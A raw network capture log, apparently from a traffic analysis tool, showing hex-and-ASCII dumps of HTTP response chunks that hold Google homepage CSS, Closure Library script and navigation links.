                                  2021-09-14 19:48:40 UTC116INData Raw: 63 6b 67 72 6f 75 6e 64 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 64 63 65 30 20 23 37 30 37 35 37 61 20 23 37 30 37 35 37 61 20 23 64 61 64 63 65 30 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6c 73 62 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 57 71 51 41 4e 62 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 6c 73 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 29 20 30 20 2d 32 36 31 70 78 20 72 65 70 65 61 74 2d 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65
                                  Data Ascii: ckground:#f8f9fa;border:solid 1px;border-color:#dadce0 #70757a #70757a #dadce0;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0 -261px repeat-x;border:none;color:#000;cursor:pointe
                                  2021-09-14 19:48:40 UTC117INData Raw: 74 69 6f 6e 28 61 2c 62 2c 65 2c 6d 2c 64 29 7b 70 21 3d 3d 61 26 26 67 6f 6f 67 6c 65 2e 6d 6c 28 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 64 3a 45 72 72 6f 72 28 61 29 2c 21 31 2c 76 6f 69 64 20 30 2c 21 31 2c 67 6f 6f 67 6c 65 2e 64 6c 3f 30 3a 32 29 3b 70 3d 6e 75 6c 6c 3b 6c 26 26 6e 3e 3d 6b 26 26 28 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 29 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 65 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72
                                  Data Ascii: tion(a,b,e,m,d){p!==a&&google.ml(d instanceof Error?d:Error(a),!1,void 0,!1,google.dl?0:2);p=null;l&&n>=k&&(window.onerror=null)};})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var e=this||self;var
                                  2021-09-14 19:48:40 UTC118INData Raw: 31 30 37 0d 0a 3a 22 22 2c 66 3a 22 2e 36 36 2e 22 2c 65 3a 22 22 2c 6d 3a 5f 74 76 6e 28 22 31 22 2c 31 29 7d 3b 0a 66 75 6e 63 74 69 6f 6e 20 63 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 22 6f 6e 22 2b 62 3b 69 66 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 21 31 29 3b 65 6c 73 65 20 69 66 28 61 2e 61 74 74 61 63 68 45 76 65 6e 74 29 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 64 2c 63 29 3b 65 6c 73 65 7b 76 61 72 20 66 3d 61 5b 64 5d 3b 61 5b 64 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6b 3d 66 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 6d 3d 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e
                                  Data Ascii: 107:"",f:".66.",e:"",m:_tvn("1",1)};function ca(a,b,c){var d="on"+b;if(a.addEventListener)a.addEventListener(b,c,!1);else if(a.attachEvent)a.attachEvent(d,c);else{var f=a[d];a[d]=function(){var k=f.apply(this,arguments),m=c.apply(this,arguments);return
                                  2021-09-14 19:48:41 UTC118INData Raw: 36 64 39 30 0d 0a 76 6f 69 64 20 30 3d 3d 6d 3f 6b 3a 6d 26 26 6b 7d 7d 7d 76 61 72 20 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 62 76 2e 6d 3d 3d 61 7d 7d 2c 65 61 3d 64 61 28 31 29 2c 66 61 3d 64 61 28 32 29 3b 70 28 22 73 62 22 2c 65 61 29 3b 70 28 22 6b 6e 22 2c 66 61 29 3b 68 2e 61 3d 5f 74 76 76 3b 68 2e 62 3d 5f 74 76 66 3b 68 2e 63 3d 5f 74 76 6e 3b 68 2e 69 3d 61 61 3b 76 61 72 20 72 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 68 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 65 77 20 49 6d 61 67 65 2c 63 3d 69 61 3b 62 2e 6f 6e 65 72 72
                                  Data Ascii: 6d90void 0==m?k:m&&k}}}var da=function(a){return function(){return g.bv.m==a}},ea=da(1),fa=da(2);p("sb",ea);p("kn",fa);h.a=_tvv;h.b=_tvf;h.c=_tvn;h.i=aa;var r=window.gbar.i.i;var t=function(){},ha=function(){},ka=function(a){var b=new Image,c=ia;b.onerr
                                  2021-09-14 19:48:41 UTC119INData Raw: 3b 70 28 22 6c 62 22 2c 44 29 3b 70 28 22 6d 63 66 22 2c 70 61 29 3b 70 28 22 62 63 66 22 2c 6f 61 29 3b 70 28 22 61 71 22 2c 41 29 3b 70 28 22 6d 64 64 22 2c 22 22 29 3b 0a 70 28 22 68 61 73 22 2c 71 61 29 3b 70 28 22 74 72 68 22 2c 76 61 29 3b 70 28 22 74 65 76 22 2c 73 61 29 3b 69 66 28 68 2e 61 28 22 6d 3b 2f 5f 2f 73 63 73 2f 61 62 63 2d 73 74 61 74 69 63 2f 5f 2f 6a 73 2f 6b 3d 67 61 70 69 2e 67 61 70 69 2e 65 6e 2e 37 52 70 68 74 4e 63 47 48 44 51 2e 4f 2f 64 3d 31 2f 72 73 3d 41 48 70 4f 6f 6f 5f 2d 7a 6d 59 68 70 5f 49 72 37 5f 43 43 78 4d 33 6c 2d 41 63 6b 4d 76 61 49 39 41 2f 6d 3d 5f 5f 66 65 61 74 75 72 65 73 5f 5f 22 29 29 7b 76 61 72 20 46 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 77 61 3f 61 7c 7c 62 3a 62 7d 2c 78
                                  Data Ascii: ;p("lb",D);p("mcf",pa);p("bcf",oa);p("aq",A);p("mdd","");p("has",qa);p("trh",va);p("tev",sa);if(h.a("m;/_/scs/abc-static/_/js/k=gapi.gapi.en.7RphtNcGHDQ.O/d=1/rs=AHpOoo_-zmYhp_Ir7_CCxM3l-AckMvaI9A/m=__features__")){var F=function(a,b){return wa?a||b:b},x
                                  2021-09-14 19:48:41 UTC121INData Raw: 70 3d 31 22 29 2c 22 26 6a 73 72 3d 22 2c 4d 61 74 68 2e 72 6f 75 6e 64 28 31 2f 46 61 29 2c 22 26 6f 67 65 76 3d 22 2c 64 28 22 6d 50 78 41 59 63 4f 6d 49 4b 66 66 7a 37 73 50 2d 4f 53 77 67 41 30 22 29 2c 22 26 6f 67 66 3d 22 2c 67 2e 62 76 2e 66 2c 22 26 6f 67 72 70 3d 22 2c 64 28 22 22 29 2c 22 26 6f 67 76 3d 22 2c 64 28 22 33 39 35 33 37 32 39 35 34 2e 30 22 29 2c 22 26 6f 67 67 76 3d 22 2b 64 28 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 31 30 38 30 33 2e 30 5f 70 31 22 29 2c 22 26 6f 67 64 3d 22 2c 64 28 22 63 6f 6d 22 29 2c 22 26 6f 67 63 3d 22 2c 64 28 22 47 42 52 22 29 2c 22 26 6f 67 6c 3d 22 2c 64 28 22 65 6e 22 29 5d 3b 62 2e 5f 73 6e 26 26 28 62 2e 5f 73 6e 3d 0a 22 6f 67 2e 22 2b 62 2e 5f 73 6e 29 3b 66 6f 72 28 76 61 72 20 6b 20
                                  Data Ascii: p=1"),"&jsr=",Math.round(1/Fa),"&ogev=",d("mPxAYcOmIKffz7sP-OSwgA0"),"&ogf=",g.bv.f,"&ogrp=",d(""),"&ogv=",d("395372954.0"),"&oggv="+d("es_plusone_gc_20210803.0_p1"),"&ogd=",d("com"),"&ogc=",d("GBR"),"&ogl=",d("en")];b._sn&&(b._sn="og."+b._sn);for(var k
                                  2021-09-14 19:48:41 UTC122INData Raw: 30 63 62 66 4e 53 33 64 6b 63 2e 44 55 22 29 3b 61 3d 61 2e 6a 6f 69 6e 28 22 22 29 3b 72 61 28 61 29 7d 3b 70 28 22 63 61 22 2c 4a 29 3b 70 28 22 63 72 22 2c 4b 29 3b 70 28 22 63 63 22 2c 48 29 3b 68 2e 6b 3d 4a 3b 68 2e 6c 3d 4b 3b 68 2e 6d 3d 48 3b 68 2e 6e 3d 4c 61 3b 68 2e 70 3d 4e 61 3b 68 2e 71 3d 4d 61 3b 76 61 72 20 4f 61 3d 5b 22 67 62 5f 37 31 22 2c 22 67 62 5f 31 35 35 22 5d 2c 50 61 3b 66 75 6e 63 74 69 6f 6e 20 51 61 28 61 29 7b 50 61 3d 61 7d 66 75 6e 63 74 69 6f 6e 20 52 61 28 61 29 7b 76 61 72 20 62 3d 50 61 26 26 21 61 2e 68 72 65 66 2e 6d 61 74 63 68 28 2f 2e 2a 5c 2f 61 63 63 6f 75 6e 74 73 5c 2f 43 6c 65 61 72 53 49 44 5b 3f 5d 2f 29 26 26 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 50 61 28 29 29 3b 62 26 26 28 61 2e 68
                                  Data Ascii: 0cbfNS3dkc.DU");a=a.join("");ra(a)};p("ca",J);p("cr",K);p("cc",H);h.k=J;h.l=K;h.m=H;h.n=La;h.p=Na;h.q=Ma;var Oa=["gb_71","gb_155"],Pa;function Qa(a){Pa=a}function Ra(a){var b=Pa&&!a.href.match(/.*\/accounts\/ClearSID[?]/)&&encodeURIComponent(Pa());b&&(a.h
                                  2021-09-14 19:48:41 UTC123INData Raw: 2c 22 67 62 74 6f 22 29 7d 7d 7d 7d 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 74 67 28 61 2c 62 2c 21 30 29 7d 29 3b 61 62 28 61 29 7d 63 61 74 63 68 28 71 29 7b 72 28 71 2c 22 73 62 22 2c 22 74 67 22 29 7d 7d 2c 63 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 63 6c 6f 73 65 28 61 29 7d 29 7d 2c 64 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 72 64 64 28 61 29 7d 29 7d 2c 59 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3b 63 26 26 63 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3f 28 61 3d 63 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 61 2c 22 22 29 29 26 26 28 62 3d 61 2e
                                  Data Ascii: ,"gbto")}}}}B(function(){g.tg(a,b,!0)});ab(a)}catch(q){r(q,"sb","tg")}},cb=function(a){B(function(){g.close(a)})},db=function(a){B(function(){g.rdd(a)})},Ya=function(a){var b,c=document.defaultView;c&&c.getComputedStyle?(a=c.getComputedStyle(a,""))&&(b=a.
                                  2021-09-14 19:48:41 UTC124INData Raw: 2b 29 69 66 28 48 28 61 2c 62 5b 64 5d 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 67 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 62 28 61 2c 62 2c 63 29 7d 2c 68 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 62 28 61 2c 22 67 62 65 22 2c 62 29 7d 2c 69 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 63 6d 26 26 67 2e 70 63 6d 28 29 7d 29 7d 2c 6a 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 63 61 26 26 67 2e 70 63 61 28 29 7d 29 7d 2c 6b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 66 2c 6b 2c 6d 2c 6e 2c 6c 2c 71 29 7b 42 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 70 61 61 26 26 67 2e 70 61 61 28 61 2c 62 2c 63 2c 64 2c 66 2c
                                  Data Ascii: +)if(H(a,b[d]))return!0;return!1},gb=function(a,b,c){fb(a,b,c)},hb=function(a,b){fb(a,"gbe",b)},ib=function(){B(function(){g.pcm&&g.pcm()})},jb=function(){B(function(){g.pca&&g.pca()})},kb=function(a,b,c,d,f,k,m,n,l,q){B(function(){g.paa&&g.paa(a,b,c,d,f,
                                  2021-09-14 19:48:41 UTC126INData Raw: 61 72 20 62 3d 22 69 6e 6e 65 72 22 2b 61 3b 61 3d 22 6f 66 66 73 65 74 22 2b 61 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 5b 62 5d 3f 77 69 6e 64 6f 77 5b 62 5d 3a 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 5b 61 5d 3f 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 5b 61 5d 3a 30 7d 2c 75 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 31 7d 2c 76 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 4f 7d 3b 70 28 22 73 6f 22 2c 56 61 29 3b 70 28 22 73 6f 73 22 2c 55 61 29 3b 70 28 22 73 69 22 2c 57 61 29 3b 70 28 22 74 67 22 2c 62 62 29 3b 0a 70 28 22 63 6c 6f 73 65 22 2c 63 62 29 3b 70 28 22 72 64 64
                                  Data Ascii: ar b="inner"+a;a="offset"+a;return window[b]?window[b]:document.documentElement&&document.documentElement[a]?document.documentElement[a]:0},ub=function(){return!1},vb=function(){return!!O};p("so",Va);p("sos",Ua);p("si",Wa);p("tg",bb);p("close",cb);p("rdd
                                  2021-09-14 19:48:41 UTC127INData Raw: 28 22 70 77 22 29 7d 29 7d 3b 70 28 22 6c 50 57 22 2c 43 62 29 3b 77 2e 70 75 73 68 28 5b 22 70 77 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 61 62 63 2f 70 77 6d 5f 34 35 66 37 33 65 34 64 66 30 37 61 30 65 33 38 38 62 30 66 61 31 66 33 64 33 30 65 37 32 38 30 2e 6a 73 22 7d 5d 29 3b 76 61 72 20 45 62 3d 5b 5d 2c 46 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 45 62 5b 30 5d 3d 61 7d 2c 47 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 7c 7c 7b 7d 3b 62 2e 5f 73 6e 3d 22 70 77 22 3b 74 28 61 2c 62 29 7d 2c 48 62 3d 7b 73 69 67 6e 65 64 3a 45 62 2c 65 6c 6f 67 3a 47 62 2c 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 75 73 6f 6e 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 2f 30 22 2c 6c 6f 61 64
                                  Data Ascii: ("pw")})};p("lPW",Cb);w.push(["pw",{url:"//ssl.gstatic.com/gb/js/abc/pwm_45f73e4df07a0e388b0fa1f3d30e7280.js"}]);var Eb=[],Fb=function(a){Eb[0]=a},Gb=function(a,b){b=b||{};b._sn="pw";t(a,b)},Hb={signed:Eb,elog:Gb,base:"https://plusone.google.com/u/0",load
                                  2021-09-14 19:48:41 UTC128INData Raw: 2c 6b 2c 22 26 6f 67 65 76 3d 22 2c 6d 2c 22 26 6f 67 66 3d 22 2c 6c 2c 22 26 6f 67 70 3d 22 2c 71 2c 22 26 6f 67 72 70 3d 22 2c 6e 2c 22 26 6f 67 73 72 3d 22 2c 63 2c 22 26 6f 67 76 3d 22 2c 45 2c 55 2c 22 26 6f 67 64 3d 22 2c 49 2c 22 26 6f 67 6c 3d 22 2c 56 2c 22 26 6f 67 63 3d 22 2c 57 2c 22 26 6f 67 75 73 3d 22 2c 79 5d 3b 69 66 28 62 29 7b 22 6f 67 77 22 69 6e 20 62 26 26 28 61 2e 70 75 73 68 28 22 26 6f 67 77 3d 22 2b 62 2e 6f 67 77 29 2c 64 65 6c 65 74 65 20 62 2e 6f 67 77 29 3b 66 3d 5b 5d 3b 66 6f 72 28 7a 20 69 6e 20 62 29 30 21 3d 66 2e 6c 65 6e 67 74 68 26 26 66 2e 70 75 73 68 28 22 2c 22 29 2c 66 2e 70 75 73 68 28 51 62 28 7a 29 29 2c 66 2e 70 75 73 68 28 22 2e 22 29 2c 66 2e 70 75 73 68 28 51 62 28 62 5b 7a 5d 29 29 3b 76 61 72 20 7a 3d 66
                                  Data Ascii: ,k,"&ogev=",m,"&ogf=",l,"&ogp=",q,"&ogrp=",n,"&ogsr=",c,"&ogv=",E,U,"&ogd=",I,"&ogl=",V,"&ogc=",W,"&ogus=",y];if(b){"ogw"in b&&(a.push("&ogw="+b.ogw),delete b.ogw);f=[];for(z in b)0!=f.length&&f.push(","),f.push(Qb(z)),f.push("."),f.push(Qb(b[z]));var z=f
                                  2021-09-14 19:48:41 UTC130INData Raw: 6c 3a 68 2e 61 28 22 22 29 2c 70 70 61 3a 68 2e 61 28 22 22 29 2c 0a 70 70 6d 3a 22 47 6f 6f 67 6c 65 2b 20 70 61 67 65 22 7d 3b 76 2e 70 72 66 3d 24 62 7d 3b 76 61 72 20 53 2c 61 63 2c 54 2c 62 63 2c 58 3d 30 2c 63 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 2e 69 6e 64 65 78 4f 66 29 72 65 74 75 72 6e 20 61 2e 69 6e 64 65 78 4f 66 28 62 2c 63 29 3b 69 66 28 41 72 72 61 79 2e 69 6e 64 65 78 4f 66 29 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 6e 64 65 78 4f 66 28 61 2c 62 2c 63 29 3b 66 6f 72 28 63 3d 6e 75 6c 6c 3d 3d 63 3f 30 3a 30 3e 63 3f 4d 61 74 68 2e 6d 61 78 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 63 29 3a 63 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 63 20 69 6e 20 61 26 26 61 5b 63 5d 3d 3d 3d 62 29 72 65 74 75 72
                                  Data Ascii: l:h.a(""),ppa:h.a(""),ppm:"Google+ page"};v.prf=$b};var S,ac,T,bc,X=0,cc=function(a,b,c){if(a.indexOf)return a.indexOf(b,c);if(Array.indexOf)return Array.indexOf(a,b,c);for(c=null==c?0:0>c?Math.max(0,a.length+c):c;c<a.length;c++)if(c in a&&a[c]===b)retur
                                  2021-09-14 19:48:41 UTC131INData Raw: 6d 28 62 2c 63 29 3a 6b 63 28 61 29 26 26 28 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 62 2c 63 29 2c 61 2e 73 61 76 65 28 61 2e 69 64 29 29 29 7d 63 61 74 63 68 28 66 29 7b 66 2e 63 6f 64 65 21 3d 44 4f 4d 45 78 63 65 70 74 69 6f 6e 2e 51 55 4f 54 41 5f 45 58 43 45 45 44 45 44 5f 45 52 52 26 26 72 28 66 2c 22 75 70 22 2c 22 73 70 64 22 29 7d 7d 2c 6d 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 72 79 7b 69 66 28 69 63 28 64 6f 63 75 6d 65 6e 74 29 29 72 65 74 75 72 6e 22 22 3b 0a 63 7c 7c 28 62 3d 22 6f 67 2d 75 70 2d 22 2b 62 29 3b 69 66 28 6a 63 28 29 29 72 65 74 75 72 6e 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 62 29 3b 69 66 28 6b 63 28 61 29 29 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 28 61 2e 69 64 29 2c
                                  Data Ascii: m(b,c):kc(a)&&(a.setAttribute(b,c),a.save(a.id)))}catch(f){f.code!=DOMException.QUOTA_EXCEEDED_ERR&&r(f,"up","spd")}},mc=function(a,b,c){try{if(ic(document))return"";c||(b="og-up-"+b);if(jc())return e.localStorage.getItem(b);if(kc(a))return a.load(a.id),
                                  2021-09-14 19:48:41 UTC132INData Raw: 3d 68 2e 61 28 22 31 22 29 2c 64 3d 68 2e 61 28 22 22 29 2c 66 3d 33 2c 6b 3d 77 2c 6d 3d 30 2c 6e 3d 77 69 6e 64 6f 77 2e 67 62 61 72 4f 6e 52 65 61 64 79 3b 69 66 28 6e 29 74 72 79 7b 6e 28 29 7d 63 61 74 63 68 28 6c 29 7b 72 28 6c 2c 22 6d 6c 22 2c 22 6f 72 22 29 7d 64 3f 70 28 22 6c 64 62 22 2c 61 29 3a 63 3f 63 61 28 77 69 6e 64 6f 77 2c 22 6c 6f 61 64 22 2c 62 29 3a 62 28 29 7d 70 28 22 72 64 6c 22 2c 71 63 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65
                                  Data Ascii: =h.a("1"),d=h.a(""),f=3,k=w,m=0,n=window.gbarOnReady;if(n)try{n()}catch(l){r(l,"ml","or")}d?p("ldb",a):c?ca(window,"load",b):b()}p("rdl",qc);}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The
                                  2021-09-14 19:48:41 UTC133INData Raw: 4e 61 6d 65 29 3f 22 67 62 6d 30 6c 22 3a 22 67 62 7a 30 6c 22 29 3b 63 26 26 66 2e 6b 28 63 2c 68 2e 74 65 73 74 28 63 2e 63 6c 61 73 73 4e 61 6d 65 29 3f 22 67 62 6d 30 6c 22 3a 22 67 62 7a 30 6c 22 29 7d 63 61 74 63 68 28 6c 29 7b 64 28 6c 2c 22 73 6a 22 2c 22 73 73 70 22 29 7d 67 3d 61 7d 2c 6d 3d 65 2e 71 73 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 68 72 65 66 3b 76 61 72 20 63 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6d 61 74 63 68 28 2f 2e 2a 3f 3a 5c 2f 5c 2f 5b 5e 5c 2f 5d 2a 2f 29 5b 30 5d 3b 63 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 63 2b 22 2f 73 65 61 72 63 68 5c 5c 3f 22 29 3b 28 62 3d 63 2e 74 65 73 74 28 62 29 29 26 26 21 2f 28 5e 7c 5c 5c 3f 7c 26 29 65 69 3d 2f 2e 74 65 73 74
                                  Data Ascii: Name)?"gbm0l":"gbz0l");c&&f.k(c,h.test(c.className)?"gbm0l":"gbz0l")}catch(l){d(l,"sj","ssp")}g=a},m=e.qs,n=function(a){var b=a.href;var c=window.location.href.match(/.*?:\/\/[^\/]*/)[0];c=new RegExp("^"+c+"/search\\?");(b=c.test(b))&&!/(^|\\?|&)ei=/.test
                                  2021-09-14 19:48:41 UTC135INData Raw: 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 77 69 6e 64 6f 77 2e 67 62 61 72 2e 72 64 6c 28 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 22 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4b 39 4b 44 70 54 4c 7a 52 45 4e 72
                                  Data Ascii: on(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/window.gbar.rdl();}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();</script></head><body bgcolor="#fff"><script nonce="K9KDpTLzRENr
                                  2021-09-14 19:48:41 UTC136INData Raw: 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 33 36 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 3f 67 6c 3d 47 42 26 74 61 62 3d 77 31 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 59 6f 75 54 75 62 65 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 34 32 36 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 77 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3f 74 61 62 3d 77 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73
                                  Data Ascii: ></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?gl=GB&tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></s
                                  2021-09-14 19:48:41 UTC137INData Raw: 54 72 61 6e 73 6c 61 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 31 30 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6f 6f 6b 73 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 70 22 3e 42 6f 6f 6b 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 36 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 73 68 6f 70 70 69 6e 67 3f 68 6c 3d 65 6e 26 73 6f 75 72 63 65 3d 6f 67 26 74 61 62 3d 77 66 22 3e 53 68 6f 70 70 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c
